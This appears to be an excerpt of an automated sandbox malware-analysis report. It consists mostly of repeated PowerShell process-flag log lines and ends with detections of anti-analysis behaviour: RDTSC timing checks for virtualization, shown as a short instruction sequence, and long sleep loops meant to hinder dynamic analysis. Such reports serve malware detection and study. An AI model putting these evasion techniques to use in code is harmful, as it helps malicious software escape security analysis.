Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 0000000000408A34 second address: 0000000000408A3A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 0000000000408DCE second address: 0000000000408DD4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000003208A34 second address: 0000000003208A3A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000003208DCE second address: 0000000003208DD4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5852 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4560 Thread sleep count: 4119 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3532 Thread sleep count: 3084 > 30 Jump to behavior
